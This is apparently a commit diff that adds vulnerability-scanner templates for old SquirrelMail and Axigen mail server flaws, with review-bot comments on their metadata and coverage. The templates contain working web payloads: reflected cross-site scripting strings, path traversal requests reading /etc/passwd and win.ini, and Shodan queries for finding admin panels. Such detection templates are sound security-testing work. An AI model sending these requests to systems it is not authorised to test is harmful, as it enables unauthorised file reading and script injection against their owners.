commit
cacf934f38
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2002-1131
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/21811
|
||||||
|
tags: xss,squirrelmail,cve,cve2002
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||||
|
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||||
|
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
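Review bot: The `description` under `info` talks about the Virtual Keyboard plugin, but the `name` and every `path` in this template target core pages (`addressbook.php`, `options.php`, `search.php`, `help.php`), so the text looks copied from the vkeyboard template later in this commit. Anyone triaging a finding would read the wrong component. A line such as `description: SquirrelMail 1.2.6/1.2.7 reflects unsanitized query parameters in several core pages, allowing cross-site scripting.` would match what the requests actually test.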
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2004-0519
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||||
|
reference: https://www.exploit-db.com/exploits/24068
|
||||||
|
tags: xss,squirrelmail,cve2004,cve
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
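Review bot: The only `path` hard-codes a `/mail` prefix (`{{BaseURL}}/mail/src/compose.php`), while the other SquirrelMail templates in this commit request `{{BaseURL}}/src/...`. An install served directly from the base URL would therefore come back clean without the vulnerable page ever being requested. Listing the unprefixed form of the same request as a second `path` entry, with `stop-at-first-match: true` as in the CVE-2002-1131 template, would make coverage consistent across the set.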
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: CVE-2006-2842
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
|
||||||
|
reference: https://www.exploit-db.com/exploits/27948
|
||||||
|
tags: cve2006,lfi,squirrelmail,cve
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
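Review bot: `name` labels this Local File Inclusion, while `description` calls it a remote file inclusion that applies only when `register_globals` is enabled and `magic_quotes_gpc` is disabled. The request (`plugins[]=../../../../etc/passwd%00`) also depends on null-byte truncation. A non-match therefore says little about whether the host is patched, which is worth a comment above `requests:`, e.g. `# Only fires with register_globals on and magic_quotes_gpc off; a miss does not mean the install is fixed.` The regex matcher has no `part` and relies on the default, so `part: body` would make the intent explicit.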
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: CVE-2012-4940
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen Mail Server - 'Filename' Directory Traversal
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
|
||||||
|
reference: https://www.exploit-db.com/exploits/37996
|
||||||
|
tags: cve,cve2012,axigen,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
|
||||||
|
- '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "bit app support"
|
||||||
|
- "fonts"
|
||||||
|
- "extensions"
|
||||||
|
condition: and
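Review bot: Both paths carry a fixed `h=44ea8a6603cbf54e245f37b4ddaf8f36`, which looks like a per-session value copied from the referenced PoC rather than something an arbitrary target would accept. If the server rejects it, the request presumably never reaches the `fileName` handling and a vulnerable host is reported clean. That limitation should be stated in a comment above `path:`, e.g. `# h= is a sample session value from the PoC; without a valid session a miss is not evidence of a fix.` The `win.ini` target and word list only cover Windows installs, and there is no `status` matcher for `200` as the other templates in this commit have.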
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: axigen-webadmin
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen Web Admin
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Axigen WebAdmin"'
|
||||||
|
tags: axigen,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Axigen WebAdmin</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: axigen-webmail
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen WebMail
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Axigen WebMail"'
|
||||||
|
tags: axigen,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Axigen WebMail</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: squirrelmail-vkeyboard-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/26305
|
||||||
|
tags: xss,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
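Review bot: The `id` here is `squirrelmail-vkeyboard-xss`, but the template targets `plugins/address_add/add.php`, and the same id is used again by the Virtual Keyboard template further down in this commit. Two templates sharing an id cannot be told apart in scan output or selected individually by id, so a finding from one may be attributed to the other plugin. Renaming this one, e.g. `id: squirrelmail-add-xss`, resolves that; if the file name was copied along with the id it should follow.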
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: squirrelmail-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail 1.2.11 Local File Inclusion
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/22793
|
||||||
|
tags: lfi,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
|
||||||
|
- "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
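Review bot: `info` has no `description`, unlike the other vulnerability templates in this commit, so a result carries only the name and an external link. A line such as `description: SquirrelMail 1.2.11 reads local files through the mailbox parameter of read_body.php and download.php.` would state what the two requests test, with the wording checked against the reference. The first path also ends in what looks like a stray `&` (`passed_id=1&`), which can probably be dropped.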
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: squirrelmail-vkeyboard-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
reference: https://www.exploit-db.com/exploits/34814
|
||||||
|
tags: xss,squirrelmail
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|